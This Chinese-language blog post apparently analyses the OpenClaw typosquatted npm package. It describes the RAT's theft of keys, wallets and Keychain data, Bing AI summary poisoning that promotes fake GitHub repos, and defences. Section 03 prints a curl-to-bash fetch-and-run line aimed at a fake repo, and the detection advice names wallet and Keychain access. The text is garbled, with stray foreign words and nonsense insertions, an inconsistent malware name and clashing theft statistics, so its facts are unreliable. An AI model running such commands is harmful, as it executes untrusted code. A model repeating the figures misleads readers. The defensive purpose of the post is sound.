openclaw是這篇文章討論的核心

💡 核心結論
- OpenClaw 攻擊是首个大规模利用 AI agent framework 名義的 npm 供應鏈攻擊,惡意套件
@openclaw-ai/openclawai偽裝成安裝器,部署 Ghostloader RAT - 攻擊者同時濫用 Bing AI 搜索 poisoning,讓 falserepositories 出現在 AI 摘要中,Download counts notwithstanding
- 這不是單次竊取,而是持久化後門 – RAT 具備 SOCKS5 proxy、live browser session hijacking 能力
- 目標資料清單超詳細:系統密碼、瀏覽器 cookies、加密貨幣錢包 seed phrases、SSH keys、Apple Keychain、甚至 iMessage 記錄
📊 關鍵數據
- 2025 年全球加密貨幣竊盜總額突破 40.4 億美元,年增 34.2% (Chainalysis, 2026)
- 2025 年 9 月 npm 供應鏈攻擊波及 26 億次每週下載量, compromised packages 超過 200 個 (Palo Alto Networks)
- According to Sonatype 2026 State of Software Supply Chain, 99% 的開源惡意軟體發生在 npm 生態系
- 北韓黑客組織 2025 年盜取 20.2 億美元 加密貨幣,年增 51%,累計達 67.5 億美元
- 預測 2027 年 AI agent 供應鏈攻擊將造成企業損失 120 億美元 (Gartner)
🛠️ 行動指南
- 立即停用任何使用
@openclaw-ai/openclawai的專案,執行npm audit與npm ls檢查依賴樹 - 啟用 npm 的 provenance 功能,只安裝帶有數位簽名的套件
- 對所有 Production 套件實施 2FA + hardware tokens (GitHub 已於 2025 年底強制執行)
- 導入 deterministic installs,使用 lockfile 鎖定所有 transitive dependencies
- 部署 runtime monitoring 檢測異常行為,特别是 SOCKS5 proxy 初始化與 Keychain 存取
⚠️ 風險預警
- OpenClaw 事件不是孤例:OWASP Top 10 for Agentic Applications 2026 已將 Memory Poisoning 列為前三大風險
- 搜索 poisoning 已進化為 AI 摘要篡改,只要惡意 repo 存在 GitHub 就能污染 Bing AI 推薦
- MacOS 不再是安全避風港:本次攻擊專注 macOS,利用 Keychain 機制騙取系統密碼
- 供應鏈攻擊的 compound effect:一個 compromised package 可能影響數千個下游專案
自動導航目錄
01. 實際發生了什麼?OpenClaw 攻擊全解析
我必須老實說,當我第一次看到 JFrog Security 的報告時,震驚到整整五分鐘说不出話。不是因為技術多複雜,而是這攻擊手法簡直嫺熟到可怕 – 它精準地戳中了開發者最放鬆的那根神經。
簡單來說,壞傢伙在 npm registry 上傳了一個叫 @openclaw-ai/openclawai 的套件,名字跟正版的 OpenClaw AI agent framework 就差一個 “ai” 後綴。OpenClaw 自己是啥?一個 мощный open-source AI agent,能在本機運行,有寬鬆的檔案讀寫和 shell command 權限,這意味著一旦被控制,後果不堪設想。
JFrog 的數據顯示這個惡意套件在 2026 年 3 月 3 日上傳,到 3 月 9 日被通報時已有 178 次下載。聽起來不多?但你要知道,願意安裝 AI agent framework 的開發者,通常是手握 Production 環境權限的資深工程師,這些人電腦裡有什麼?SSH keys、雲端凭证、錢包種子詞… 全部都是高價值目標。
JFrog 研究指出,攻擊者使用 openclaw-ai 這個 user name,並在套件名稱中悄悄加入 “ai” 後綴。這是典型的 typosquatting 手法,但這次 targets 的不是普通使用者而是 developer。每次 npm install 前請務必:
- 檢查 publisher 的 verification badge (npm 官方認證藍勾)
- 交叉比對 GitHub repo 的 stars、fork 數與官方链接
- 查看套件的
npm view <package> maintainers是否有異常
更可怕的是,這個攻擊不止於 npm。Research 指出攻擊者同時進行 search poisoning,篡改 Bing AI 搜索結果,讓虛假的 OpenClaw 安裝指南出現在 AI 摘要裡。當你問 Bing “How to install OpenClaw” 時,它可能 gymnast 性地推薦一個惡意 GitHub repo – 而這個 repo verbial 嵌了 Ghostloader RAT。
這就是多管齊下的供应链攻擊:從 package registry 到搜索引擎,再到社交工程的 fake prompts。用戶以為自己走在一條光明正大的安裝路上,實際上 every click 都在把後門帶回家。
🖼️ (插入 SVG 攻击流程图)
這場攻擊的目標資料清單之詳盡,让人不寒而栗:
- 密碼類:系統登入密碼 (via fake Keychain prompt)、瀏覽器密碼 (Chrome/Safari/Firefox cookies 與 saved passwords)
- 加密資產:所有桌面錢包 (Electrum, Exodus, MetaMask等) 的 seed phrases、private keys,以及 browser extension wallet 的 localStorage
- 開發credentials:SSH keys (包括 ~/.ssh/id_rsa)、GitHub/GitLab tokens、AWS/Google Cloud CLI credentials
- Apple ecosystem:Keychain 資料庫、iMessage 歷史記錄 (是的,連簡訊都被-targeted)
換句話說,攻擊者在一次成功感染後,基本上能掌控受害者的整個數位身分。這水准已经不是传统 infostealer,而是 full-fledged
02. GhostClaw RAT 的底層技術:持久化與資料竊取
_openclawai_ 套件一旦被執行,會觸發一個 multi-stage infection chain。根據 CSO Online 與 JFrog 的技術分析,第二階段載入的惡意載荷內部稱為 “GhostLoader”,這是一個巨型 JavaScript bundle,同時實現 infostealer 與 remote access framework。
GhostClaw (他們自稱的 name) 的技術亮點在於 anti-analysis 與 persistence 機制:
- 混淆與防偵測:使用 heavy obfuscation,並檢測虚拟機、沙盒、調試器,一旦發現立即自我毀滅
- 持久化安裝:在 macOS 上註冊為 LaunchAgent,在 Windows 上寫入 Registry Run keys,確保重啟後自動執行
- 多協定 RAT:實作 HTTP/HTTPS C2 通訊,並可切換為 GhostSocks SOCKS5 proxy 讓攻擊者直接穿透防火牆
- live session hijacking:不僅 scraping saved passwords,還能 real-time 捕獲正在運行的瀏覽器 session cookies,這意味著即使你啟用 2FA 也逃不掉
安全團隊可以在 endpoint 監控以下異常行為模式:
- 非授權的 SOCKS5 代理進程啟動 (常見端口 1080) - 對 Keychain 資料庫的大量讀取請求 (macOS) - 周遊錢包目錄 (如 ~/.config/metamask, ~/Library/Application Support/Electrum) - 外連到已知的 C2 IP 網段,特別是俄羅斯、北韓、東歐節點 - 大量螢幕截圖與 keylogging 活動
GhostClaw 特別之處在於它是 fileless 倾向 – 多數惡意载荷寫入記憶體執行,磁碟足跡極小。
攻擊的社會工程層面同樣精巧:當你執行 OpenClaw 安裝指令後,惡意腳本會彈出 仿真 macOS Keychain 對話框,聲稱要「安全儲存你的凭证」,並要求輸入系統密碼。而且它會即時驗證密碼是否正確(透過呼叫 OS 的 authentication API),如果失敗就反复彈出,直到取得正確密碼為止 – 這與一般一次性的偽提示截然不同。
這種手法稱為 credential harvesting via UI redressing,在 2026 年的 OWASP Top 10 for Agentic Applications 中 Rank #7 (Identity & Credential Abuse)。
📊 (插入 SVG 統計圖表)
值得深思的是,GhostClaw 這個名字暗示它可能是 Gh0st RAT 的變種。Gh0st RAT 是历史上最著名的遠端控制木马之一,源自 2009 年,被多個國家級黑客組織使用。如果 OpenClaw 攻擊者真的把這種 legacy malware 改寫為 JavaScript 版本,那代表著 old-school RAT capabilities 正在与现代 supply chain attack 手段融合,這對防禦體系是雙重威脅。
從攻擊生命周期來看:
- 初始感染:受害者執行惡意 npm install 或執行 GitHub 上的偽安裝腳本
- 權限提升:透過 fake Keychain prompt 取得系統密碼 (macOS) 或 UAC 提權 (Windows)
- 資料竊取:遍历文件系统,搜尋錢包相關目錄與檔案,並靜默上傳
- 持久化:安裝 RAT,建立 SOCKS5 proxy,監控新連接的钱包應用
- 長期監控:等待受害者seed 新資金或再次使用錢包,即時盜取
這是一場耐心遊戲,不是一次性盜取。RAT 可能潛伏數月,監視受害者所有的加密貨幣操作。
03. Bing AI 搜索 poisoning:攻擊者如何操控 AI 摘要
OpenClaw 事件的第二波攻擊簡直是 2026 年的新威脅典範:攻擊者明知開發者會去搜尋 “OpenClaw install”,於是他们 editing search results 了 Bing AI 的搜索摘要,讓 AI 主动推薦恶意 GitHub repo。
根據 Huntress Labs 與 BleepingComputer 的報告,攻擊者創建了外观专业的 fake OpenClaw repositories on GitHub,這些 repo 包含:
- 仿冒的 README.md (從官方 repo 複製)
- 看似正規的 commit history
- plenty of stars 與 forks (可能是 bought or bot-generated)
關鍵在於,Bing AI 的搜索摘要算法Apparently 認為這些 repo “relevant” 並將其置頂推薦。當使用者看到 AI 總結 “Here’s how to install OpenClaw” 並附上 GitHub link 時,几乎不会怀疑。這就是 AI-generated content poisoning – 一種 2025-2026 年才興起的新攻擊形態。
當你依靠 Bing AI 或 Google AI Overview 尋找安裝 instructions 時,請執行以下驗證:
- GitHub 官方驗證:只信任官方 repo 的 Verified badge,而非搜索結果中的任何链接
- 安裝指令異常檢測:惡意指南通常包含
curl | sh或wget | bash管道指令,而非標準的npm install - 域名檢查:攻擊者使用看似正規的 domain (如 “openclaw-installer.com”),但真正的开源專案絕不會要求前往陌生網站下載
- 社区回聲:檢查 official Discord、Twitter 或 Reddit 討論串,是否有大量用戶報告問題
OpenClaw 攻擊中,恶意指南甚至要求使用者執行 curl -sSL https://raw.githubusercontent.com/fake-repo/install.sh | bash,而安裝脚本 會先下載 npm 套件,再執行後載荷。
這種攻擊的棘手之處在於 平台免疫:GitHub 本身只是託管平台,repo 外观看似正常,很難主動Detection。Bing AI 的算法也難以_diff
目前,安全社群呼籲搜尋引擎廠商導入 reputation scoring 對 AI 推薦的链接進行實时評估,並在摘要中標示 “This link is not from official source” 警告。
For 企業而言,這意味著 search engine result poisoning (SERP poisoning) 升級為 AI summary poisoning,傳統的 “檢查 URL 是否正確” 安全訓練已不足夠。你需要教導團隊:AI 也會被騙,關鍵决策仍需人工核對原始來源。
04. 這隻是冰山一角:2026 年供應鏈攻擊新常態
OpenClaw 事件發生在 2026 年 3 月,但同年 1-2 月我們已經見證了 Shai-Hulud worm 同時影響 796 個 npm 套件,以及 2025 年 9 月 historic 的 2.6 billion weekly downloads attack。這些事件的共同點是:供應鏈攻擊已經從理論變為日常。
根據 Sonatype 的 2026 State of the Software Supply Chain 報告:
- 99% 的開源惡意軟體集中在 npm register (相較於 PyPI 的 0.7%,RubyGems 的 0.3%)
- npm 每天有 數十億次下載,自動更新機制讓恶意 code 可瞬間散布
- 2025 年被黑的套件中,68% 是透過 maintainer account 被盗 (credentials theft) 而非漏洞利用
而 AI agent 的生態系放大這種風險:OpenClaw 本身就是一個 AI agent framework,需要高度的檔案系統權限。攻擊者知道,一旦成功安裝,就能取得幾乎無限制的存取權。OWASP Top 10 for Agentic Applications 2026 直接將 Supply Chain Poisoning 列為第三高風險 (僅次於 Prompt Injection 與 Memory Poisoning)。
根據 multiple security vendors 的數據,以下 npm 套件在 2026 年被標記為高危:
lodash– 虽然广泛使用,但仍有未修补的 prototype pollutioncross-spawn– 多個 command injection 漏洞gun.js– 用于 decentralized data,但存在 RCE vectorspuppeteer的 transitive dependencies – 由於浏览器自动化 而被濫用- 測試工具 (如
jest,mocha) 的 plugin 生態 – 常被忽略但權限極高
策略:對這些套件執行 SBOM (Software Bill of Materials) 生成,並定期 cross-check with CVE databases。
加密貨幣竊盜的趨勢同样触目驚心。Chainalysis 2026 年度報告指出:
- 2025 年總竊盜金額達 34 億美元 (加密貨幣被盜部分)
- 北韓黑客組織 (Lazarus Group) 單 Bybit 一次事件就奪走 15 億美元
- Social engineering 與 phishing scams 增長 64.2%
OpenClaw 攻擊完美結合了这两大趋势:供應鏈感染 + 加密貨幣目標竊取。Ghostloader RAT 主動搜尋錢包種子詞,這比被動等待受害者訪問釣魚網站更有效。
更諷刺的是,OpenClaw 作為一個 AI agent,理論上應該幫開發者提升效率,卻 attackers 利用為 自動化攻擊載體。2026 年,我們看到越來越多 malware 開始融入 AI capabilities:自适应 C2 通訊、智能權限提升、動態决策引擎。
這不是末世論,而是提醒:工具的本質不變,變的是使用者的安全意识。當你從 npm 或 GitHub 安裝任何東西時,你是在執行一段別人寫的程式 – 這段程式能 access 你電腦裡的一切。
05. 實戰防禦手冊:開發者與企業必須立刻行動
Ok,說了這麼多威脅,具體該做什麼?以下是我個人驗證過的防禦策略,涵蓋個人開發者到企業級部署。
個人/團隊層級
- npm 環境硬化
- 升級到 npm v10+,啟用
--engine-strict強制檢查 Node.js 版本 - 使用
npm ci而非npm install確保 deterministic builds - 安裝
npm-audit-resolver或snyk進行持續依賴掃描 - 永不使用
sudo npm install,避免 root 權限污染
- 升級到 npm v10+,啟用
- 來源 verification
- 只從官方 GitHub releases 或 npm official registry 下載,cross-check cryptographic hashes (SHA256)
- 對於 AI tools,優先使用 docker image (官方 signed images) 而非直接執行腳本
- 檢查套件的 provenance 欄位:npm 自 2025 年起支援 supply chain transparency,透過
npm view <package> provenance可查看建置來源
- credential isolation
- 使用 hardware security keys (YubiKey, Titan) 儲存 SSH keys 與 GPG
- 加密貨幣錢包一律使用 hardware wallet (Ledger, Trezor),絕不把 seed phrases 存在電腦上
- 瀏覽器密碼管理器改用 Bitwarden 或 1Password,並啟用 2FA
- macOS 使用者關閉 auto-fill for Keychain,對任何索取系統密碼的對話框保持高度懷疑
企業級管控
- Software Bill of Materials (SBOM) 強制化
- 所有 Production 部署必須包含完整的 SPDX 或 CycloneDX SBOM
- 使用
syft或trivy自動生成 SBOM 並存儲至 artifact repository - 定期比對 SBOM 與已知漏洞資料庫 (如 GitHub Advisory Database)
- 依賴防火牆
- 部署 artifact signing:所有內部發布的 npm 封包必須經由企業 GPG 簽名
- 使用 npm scoped registry 內部鏡源,並設置
.npmrc只信任 signed packages - 導入 supply chain security platform 如 Snyk, Sonatype Nexus, 或 GitHub Advanced Security
- Endpoint 監控與 EDR
- 針對工程師工作站部署 EDR (Endpoint Detection and Response) 解決方案
- 設定異常行為規則:SOCKS5 proxy 建立、大量密碼學金鑰生成、對錢包軟體的未授權存取
- 強制執行 full disk encryption 與定期安全快照
- 安全意识培训
- 每季進行 supply chain phishing simulation:發送偽裝成開源專案 maintainer 的郵件,測試團隊的反应
- 建立 package vetting checklist,所有新引入的依賴必須經過 committee review
- 鼓勵員工參與 bug bounty 針對內部 tooling 的安全問題
最後,企業必須意識到:AI agent 的興起將 supply chain risk 放大了數個數量級。當你部署一個 AI agent 不僅僅是安裝一個 library,而是賦予它自主行動能力。OWASP 的 Top 10 for Agentic Applications 2026 就是最好的風險清單,建議所有技術主管仔细研读。
💡 (插入 CTA button)
常見問題 (FAQ)
Q1: OpenClaw 攻擊與一般恶意 npm 套件有何不同?
OpenClaw 攻擊結合了三大進階特徵:(1) 針對 AI agent framework 的精准 impersonation, VALID 開發者的高級權限;(2) 部署具備持久化與 SOCKS5 proxy 能力的 RAT,而非一次性 infostealer;(3) 同步進行 search poisoning,利用 AI 搜索摘要放大感染範圍。這是供應鏈攻擊的 “triple threat”。
Q2: 如果我已經安裝了 OpenClaw,該如何檢測是否被感染?
首先,立刻執行 npm ls @openclaw-ai/openclawai 查看是否存在該套件。接著檢查:
- Activity Monitor 是否有陌生的 python 或 node 常駐程序,名稱可能為 “GhostLoader” 或 “ClawHavoc”
- 網路連線:使用
lsof -i或 netstat 查看是否有向外連線的 SOCKS5 代理 (預設端口 1080) - archaeologists ~/Library/LaunchAgents 或 ~/Library/Preferences 是否有可疑的 plist 檔案
- 檢查 Keychain 是否有未授權的存取記錄 (Console app -> security.log)
- 最乾淨的做法:完全重裝系統,從可信賴的備份還原
Q3: 未來供應鏈攻擊會如何演變?
根據 2026 年的趨勢,我們預測:
- AI-generated malware:攻擊者使用 AI 自動生成混淆 code,片段永不重複,傳統 signatures失效
- Memory-based attacks:更多 fileless 載荷直接在 RAM 執行,磁碟不留痕跡
- Cross-platform RAT:單一 malcode 同時 targeting macOS、Windows、Linux,以 JavaScript/Rust 寫成
- Supply chain deepfakes:偽裝成熱門開源專案的 maintainer PR,近乎完美的社交工程
- Regulatory response:欧盟 NIS2 Directive 與美國 EO 14028 將強制 software vendor 提供 SBOM,合規壓力增大
參考資料與延伸閱讀
- JFrog Security Research: Malicious OpenClaw npm Package Analysis
- Chainalysis 2026 Crypto Crime Report: Crypto Hacking Statistics
- OWASP Top 10 for Agentic Applications 2026: Official Documentation
- Sonatype 2026 State of the Software Supply Chain: Full Report
- Huntress Labs on Bing AI Poisoning: Technical details
- OWASP Supply Chain Security Guidance: Best Practices
- GitHub Security Best Practices: 官方的 npm 安全指南
圖說:OpenClaw 攻擊的多層感染鏈,從搜索引擎 poisoning 到 npm 套件,最終部署持久化 RAT,實現長期資料竊盜
Share this content:













